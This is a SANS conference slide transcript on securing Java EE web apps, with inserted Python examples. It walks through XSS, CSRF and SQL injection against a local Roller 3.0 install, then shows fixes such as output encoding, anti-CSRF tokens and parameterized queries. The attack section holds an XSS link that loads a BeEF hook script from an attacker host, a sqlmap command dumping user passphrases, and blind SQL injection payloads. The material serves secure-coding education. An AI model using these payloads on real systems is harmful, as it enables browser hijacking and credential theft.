Securing Java EE Web Apps
  • This slide deck is for presentations only.
  • SANS has a number of free resources that you can access to learn about application and software security. The SANS Software Security web site has free white papers, webcasts, and other information as well as the associated AppSec Street Fighter blog. You can also follow us on Twitter for the latest news, information, and discounts on upcoming events. SANS has various courses on web application security, secure coding, and penetration testing where you can learn the skills required to create more secure applications. These courses include the following:
    • DEV522: Web Application Security Essentials is a six-day course where you learn how to create secure web applications that are resistant to attack.
    • DEV541: Secure Coding in Java/JEE is a four-day course that covers secure coding techniques that you can use to build more secure Java/JEE applications.
    • DEV530: Essential Secure Coding in Java/JEE is a two-day course that covers the most essential topics for creating Java web apps. This course is ideal for students who cannot be away from the office for extended periods of time.
    • DEV544: Secure Coding in .NET is a four-day course that covers secure coding techniques that you can use to build more secure .NET applications.
    • DEV532: Essential Secure Coding in ASP.NET is a two-day course that covers the most essential topics for creating ASP.NET apps. This course is ideal for students who cannot be away from the office for extended periods of time.
    • DEV542: Web App Pentesting & Ethical Hacking is a six-day course where you learn how to hack web applications.

Securing Java EE Web Apps: Presentation Transcript

  • Securing Java EE Web Apps
    • Frank Kim
    • Principal, ThinkSec
    • Author, SANS Institute
  • About
    • Frank Kim
      • Consultant, ThinkSec
      • Author, SANS Secure Coding in Java/JEE
      • SANS Application Security Curriculum Lead
  • What You Should Know
    • Hacking is not hard
    • Don’t trust any data
      • Assume that your users are evil!
  • Outline
    • Web App Attack Refresher
      • XSS, CSRF, SQL Injection
    • Testing
      • Hacking an open source app
    • Secure Coding
      • Fixing security bugs
  • Cross-Site Scripting (XSS)
    • Occurs when unvalidated data is displayed back to the browser
    • Types of XSS
      • Stored
      • Reflected
      • Document Object Model (DOM) based
  • Cross-Site Request Forgery (CSRF)
  • SQL Injection (SQLi)
    • Occurs when dynamic SQL queries are used
      • By injecting arbitrary SQL commands, attackers can extend the meaning of the original query
      • Can potentially execute any SQL statement on the database
    • Very powerful
      • #1 on CWE/SANS Top 25 Most Dangerous Software Errors
      • #1 on OWASP Top 10
  • Outline
    • Web App Attack Refresher
      • XSS, CSRF, SQL Injection
    • Testing
      • Hacking an open source app
    • Secure Coding
      • Fixing security bugs
  • What are We Testing?
    • Installation of Roller 3.0
    • Fake install of SANS AppSec Street Fighter Blog
    • Want to simulate the actions that a real attacker might take
      • There are definitely other avenues of attack
      • We're walking through one attack scenario
  • Attack Scenario
    • XSS to control the victim's browser
    • Combine XSS and CSRF to conduct a privilege escalation attack
      • Use escalated privileges to access another feature
    • Use SQL Injection to access the database directly
  • Spot the Vuln - XSS
  • XSS in head.jsp
  • Testing the "look" Param
    • Admin pages include head.jsp
    • The param is persistent for the session
  • XSS Exploitation
    • Introducing BeEF
      • Browser Exploitation Framework
      • http://www.bindshell.net/tools/beef
    • Uses XSS to hook the victim's browser
      • Log user keystrokes, view browsing history, execute JavaScript, etc
      • Advanced attacks - Metasploit integration, browser exploits, etc
  • XSS Exploitation Overview
    • 1) Attacker sends link with evil BeEF script: http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>
    • 2) Victim clicks evil link
    • 3) Victim's browser sends data to attacker
  • BeEF XSS Demo
  • Spot the Vuln - CSRF
  • CSRF in UserAdmin.jsp
    • Want to use CSRF to change this field
  • CSRF Demo
  • Spot the Vuln – SQL Injection
  • SQL Injection in UserServlet
  • SQL Injection Testing
    • UserServlet is vulnerable to SQLi
      • http://localhost:8080/roller/roller-ui/authoring/user
      • (screenshot: the search page shows "No results")
  • Exploiting SQL Injection
    • Introducing sqlmap
      • http://sqlmap.sourceforge.net
    • Tool that automates detection and exploitation of SQL Injection vulns
      • Supports MySQL, Oracle, PostgreSQL, MS SQL Server
      • Supports blind, inband, and batch queries
      • Fingerprint/enumeration - dump db schemas, tables/column names, data, db users, etc
      • Takeover features - read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc
  • sqlmap Syntax
    • Dump userids and passwords
      • python sqlmap.py
      • -u "http://localhost:8080/roller/roller-ui/authoring/user?startsWith=f%25"
      • --cookie "username=test; JSESSIONID=<INSERT HERE>"
      • --drop-set-cookie -p startsWith
      • --dump -T rolleruser -C username,passphrase -v 2
  • SQL Injection Demo
  • How it Works
    • f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy
    • f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy
    • f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy
  • Step By Step [0]
    • SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1 ;
    • returns ilovethetajmahal
  • Step By Step [1]
    • select MID ((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1 , 1);
    • returns i
    • select MID ((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2 , 1);
    • returns l
    • select MID ((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3 , 1);
    • returns o
  • Step By Step [2]
    • select ORD (MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1 , 1));
    • returns 105
    • select ORD (MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2 , 1));
    • returns 108
    • select ORD (MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3 , 1));
    • returns 111
  • Attack Summary
    • XSS to control the victim's browser
    • Combine XSS and CSRF to conduct a privilege escalation attack
      • Use escalated privileges to access another feature
    • Use SQL Injection to access the database directly
  • Outline
    • Web App Attack Refresher
      • XSS, CSRF, SQL Injection
    • Testing
      • Hacking an open source app
    • Secure Coding
      • Fixing security bugs
  • Data Validation (diagram)
    • Inbound data: validation on the way into the application ("Should I be consuming this?")
    • Outbound data: encoding on the way out ("Should I be emitting this?")
    • The same validation/encoding pair applies between the application and the data store, in both directions
  • Output Encoding
    • Encoding
      • Convert characters so they are treated as data and not special characters
    • Must escape differently depending where data is displayed on the page
    • XSS Prevention Cheat Sheet
      • http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
  • Fix XSS in head.jsp
    • Add URL encoding
    • <link rel="stylesheet" type="text/css" media="all" href="<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css" />
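The contextual-encoding point above, as an added Python example (not Roller's or ESAPI's code): the theme value lands in a URL path segment inside href, so it gets URL encoding, and HTML-attribute escaping alone would leave path characters untouched. CONTEXT_PATH, the encoder names and the payload host are assumptions.

```python
import html
from urllib.parse import quote

# Added example (not Roller's or ESAPI's code). In head.jsp the "look"/theme
# parameter ends up inside a URL path segment within an href attribute, so the
# right encoder is URL (percent) encoding, as the fix above applies.

CONTEXT_PATH = "/roller"  # assumed value of request.getContextPath()

# Shape of the payload from the BeEF slide, with a placeholder host
PAYLOAD = '"><script src="http://attacker.example/hook.js"></script>'


def encode_for_url(value: str) -> str:
    """Percent-encode everything but unreserved characters; safe='' means
    '/' is encoded too, so the value cannot escape its path segment."""
    return quote(value, safe="")


def encode_for_html_attr(value: str) -> str:
    """HTML attribute context: escapes & < > quotes, but leaves '/' and '.'
    alone, which is why it is the wrong encoder for a path segment."""
    return html.escape(value, quote=True)


def stylesheet_link(theme: str, encoder=encode_for_url) -> str:
    """Render the <link> tag the way the fixed head.jsp does."""
    return (f'<link rel="stylesheet" type="text/css" media="all" '
            f'href="{CONTEXT_PATH}/roller-ui/theme/{encoder(theme)}/colors.css" />')


def attribute_intact(tag: str) -> bool:
    """True when the tag still has only its own four quoted attributes
    (8 double quotes) and no injected element, i.e. the value stayed in href."""
    return tag.count('"') == 8 and "<script" not in tag.lower()
```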
  • Fix CSRF
    • UserAdmin.jsp
      • Add anti-CSRF token
    • <input type="hidden" name=<%= CSRFTokenUtil.SESSION_ATTR_KEY %> value=<%= CSRFTokenUtil.getToken(request.getSession(false)) %> >
    • UserAdminAction.java
      • Check anti-CSRF token
    • if (!CSRFTokenUtil.isValid(req.getSession(false), req)) {
    •     return mapping.findForward("error");
    • }
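A minimal synchronizer-token helper with the same three operations the fix relies on (token stored in the session, hidden field emitted by the JSP, validation that forwards to "error"), as an added Python example rather than Roller's CSRFTokenUtil; the session is a dict standing in for HttpSession and SESSION_ATTR_KEY is an assumed name.

```python
import hmac
import secrets

# Added example, not Roller's CSRFTokenUtil: one token per session, echoed in
# a hidden field and compared in constant time on every state-changing request.
SESSION_ATTR_KEY = "csrfToken"  # assumed attribute / form parameter name


def get_token(session):
    """Return the session's token, creating it on first use. `session` is a
    dict; None stands for getSession(false) returning null."""
    if session is None:
        raise ValueError("no session: user is not logged in")
    if SESSION_ATTR_KEY not in session:
        session[SESSION_ATTR_KEY] = secrets.token_urlsafe(32)
    return session[SESSION_ATTR_KEY]


def hidden_field(session):
    """The <input type="hidden"> that UserAdmin.jsp adds to the form."""
    return f'<input type="hidden" name="{SESSION_ATTR_KEY}" value="{get_token(session)}">'


def is_valid(session, params):
    """False when there is no session, no stored token, no submitted token,
    or the two differ; a forged cross-site form cannot know the token."""
    if session is None:
        return False
    expected = session.get(SESSION_ATTR_KEY)
    submitted = params.get(SESSION_ATTR_KEY)
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def handle_user_admin(session, params):
    """UserAdminAction: forward to 'error' unless the token checks out."""
    return "success" if is_valid(session, params) else "error"
```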
  • Fix SQL Injection
    • Use parameterized queries correctly
    • if (startsWith == null || startsWith.equals("")) {
    •     query = "SELECT username, emailaddress FROM rolleruser";
    •     stmt = con.prepareStatement(query);
    • } else {
    •     // the user-supplied prefix is bound as a value, never concatenated into the SQL text
    •     query = "SELECT username, emailaddress FROM rolleruser "
    •           + "WHERE username like ? or emailaddress like ?";
    •     stmt = con.prepareStatement(query);
    •     stmt.setString(1, startsWith + "%");
    •     stmt.setString(2, startsWith + "%");
    • }
    • rs = stmt.executeQuery();
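The "How it Works" probes and the parameterized fix side by side, as an added example that is not Roller's UserServlet: the concatenated query from before the fix and the bound-parameter query after it, run against a constructed in-memory SQLite table (SQLite spells MySQL's ORD/MID as UNICODE/SUBSTR), showing that the boolean condition changes the result set only when the input is concatenated.

```python
import sqlite3

# Added example, not Roller's UserServlet: the dynamic-SQL version of the
# search beside the parameterized fix, run against an in-memory SQLite table
# constructed here. SQLite spells MySQL's ORD(MID(...)) as UNICODE(SUBSTR(...)).

def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE rolleruser (username TEXT, emailaddress TEXT, passphrase TEXT)")
    con.executemany("INSERT INTO rolleruser VALUES (?, ?, ?)", [  # constructed rows
        ("admin", "admin@example.test", "s3cret"),
        ("bob", "bob@example.test", "hunter2"),
        ("frank", "frank@example.test", "ilovethetajmahal"),  # third row: LIMIT 2, 1
    ])
    return con


def vulnerable_search(con, starts_with: str) -> list:
    """Before the fix: the parameter is spliced into the statement text."""
    query = ("SELECT username, emailaddress FROM rolleruser WHERE username LIKE '"
             + starts_with + "%' OR emailaddress LIKE '" + starts_with + "%'")
    return con.execute(query).fetchall()


def safe_search(con, starts_with: str) -> list:
    """After the fix: the same text is only ever bound as a LIKE value."""
    query = ("SELECT username, emailaddress FROM rolleruser "
             "WHERE username LIKE ? OR emailaddress LIKE ?")
    return con.execute(query, (starts_with + "%", starts_with + "%")).fetchall()


def blind_probe(con, search, position: int, threshold: int) -> bool:
    """The boolean condition from the 'How it Works' slide appended to the
    'f%' prefix: True when the search still returns rows, which for the
    concatenated query means the character at `position` of the third
    passphrase is > `threshold`; the bound query never answers."""
    probe = ("f%' AND UNICODE(SUBSTR((SELECT IFNULL(passphrase, ' ') FROM rolleruser "
             f"LIMIT 2, 1), {position}, 1)) > {threshold} AND 'neEy' LIKE 'neEy")
    return len(search(con, probe)) > 0
```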
  • Building Secure Software (diagram; source: Microsoft SDL)
  • Remember
    • Hacking is not hard
    • Don’t trust any data
      • Validate input
        • Prefer whitelists
        • Use authenticity token
      • Encode output
        • Contextual encoding
        • Use parameterized queries
  • SANS Software Security
    • SANS AppSec 2012
      • April 30 - May 1 in Las Vegas
      • CFP is open now!
      • http://sans.org/appsec-2012
    • New courses
      • DEV551 Secure iOS Development
      • DEV568 Secure Android Development
    • Free resources
      • Top 25, blog, white papers, webcasts, and more at
      • http://software-security.sans.org
    • Discount
      • Save 10% using the discount code DEVOXX. Enterprise pricing available.
  • Thanks!
    • Frank Kim
    • [email_address] @sansappsec